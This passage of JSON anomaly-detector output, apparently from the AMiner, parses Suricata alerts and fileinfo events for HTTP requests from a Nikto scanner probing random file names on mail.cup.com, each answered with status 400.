Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46834, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cgi+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.220821, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46834, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1821920815897391, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80", "/parser/model/time": 1583349514.222374, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46836, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.no", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.222542, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":770079030141252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46836, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":770079030141252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 770079030141252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22408, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46838, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shtml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.224312, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1783781506312318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": 
null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46838, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783781506312318,", 
